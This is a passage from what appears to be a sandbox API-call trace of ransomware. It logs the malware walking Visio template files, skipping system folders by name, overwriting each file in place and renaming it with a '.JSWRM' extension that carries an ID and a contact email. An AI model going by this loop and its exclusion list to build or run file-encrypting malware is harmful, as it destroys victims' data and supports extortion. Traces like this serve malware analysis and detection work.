(lpString1="DIMENG_M.VSSX", lpString2="..") returned 1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="...") returned 1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="windows") returned -1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="recovery") returned -1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="perflogs") returned -1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="documents and settings") returned -1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="system volume information") returned -1 [0147.309] lstrcmpiW (lpString1="DIMENG_M.VSSX", lpString2="msocache") returned -1 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMENG_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMENG_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.309] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.309] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.311] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=116056) returned 1 [0147.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.311] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1c550, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1c550, lpOverlapped=0x0) returned 1 [0147.321] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.321] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1c550, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1c550, lpOverlapped=0x0) returned 1 [0147.322] CloseHandle (hObject=0x314) returned 1 [0147.324] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.325] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x30ca74c, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x30ca74c, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x30ca74c, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x1b2c0, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DIMENG_U.VSSX", cAlternateFileName="DIMENG~2.VSS")) returned 1 [0147.325] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2=".") returned 1 [0147.325] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="..") returned 1 [0147.325] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="...") returned 1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="windows") returned -1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="recovery") returned -1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="perflogs") returned -1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="documents and settings") returned -1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="system volume information") returned -1 [0147.326] lstrcmpiW (lpString1="DIMENG_U.VSSX", lpString2="msocache") returned -1 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMENG_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DIMENG_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DIMENG_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.326] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.328] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=111296) returned 1 [0147.328] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.328] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x1b2c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x1b2c0, lpOverlapped=0x0) returned 1 [0147.342] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.342] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x1b2c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x1b2c0, lpOverlapped=0x0) returned 1 [0147.343] CloseHandle (hObject=0x314) returned 1 [0147.343] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DIMENG_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\dimeng_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.345] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x12296, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", cAlternateFileName="DOCUME~2.VST")) returned 1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2=".") returned 1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="..") returned 1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="...") returned 1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="windows") returned -1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="recovery") returned -1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="perflogs") returned -1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="documents and settings") returned -1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="system volume information") returned -1 [0147.345] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpString2="msocache") returned -1 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpUsedDefaultChar=0x0) returned 33 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCUMENT_APPROVAL_WORKFLOW_M.VSTX", lpUsedDefaultChar=0x0) returned 33 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.345] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.346] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=74390) returned 1 [0147.346] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.347] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12290, lpOverlapped=0x0) returned 1 [0147.486] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.486] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12290, lpOverlapped=0x0) returned 1 [0147.487] CloseHandle (hObject=0x314) returned 1 [0147.487] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.489] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4a459ce, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4a459ce, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4a459ce, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x11add, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", cAlternateFileName="DOCUME~1.VST")) returned 1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2=".") returned 1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="..") returned 1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="...") returned 1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="windows") returned -1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="recovery") returned -1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="perflogs") returned -1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="documents and settings") returned -1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="system volume information") returned -1 [0147.489] lstrcmpiW (lpString1="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpString2="msocache") returned -1 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpUsedDefaultChar=0x0) returned 33 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", cchWideChar=33, lpMultiByteStr=0x22d0d8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DOCUMENT_APPROVAL_WORKFLOW_U.VSTX", lpUsedDefaultChar=0x0) returned 33 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.491] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=72413) returned 1 [0147.491] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.491] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11ad0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x11ad0, lpOverlapped=0x0) returned 1 [0147.543] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.543] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11ad0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x11ad0, lpOverlapped=0x0) returned 1 [0147.544] CloseHandle (hObject=0x314) returned 1 [0147.544] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DOCUMENT_APPROVAL_WORKFLOW_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\document_approval_workflow_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.547] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x21e3c29, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x21e3c29, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x21e3c29, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x141c4, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRAWTL_M.VSSX", cAlternateFileName="DRAWTL~1.VSS")) returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2=".") returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="..") returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="...") returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="windows") returned -1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="recovery") returned -1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="perflogs") returned -1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="documents and settings") returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="system volume information") returned -1 [0147.547] lstrcmpiW (lpString1="DRAWTL_M.VSSX", lpString2="msocache") returned -1 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRAWTL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DRAWTL_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DRAWTL_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0147.547] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0147.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0147.549] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=82372) returned 1 [0147.549] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.549] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x141c0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x141c0, lpOverlapped=0x0) returned 1 [0147.557] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0147.557] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x141c0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x141c0, lpOverlapped=0x0) returned 1 [0147.558] CloseHandle (hObject=0x314) returned 1 [0147.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\DRAWTL_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\drawtl_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0147.559] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x29a3769, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x29a3769, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x29a3769, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x13707, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="DRAWTL_U.VSSX", 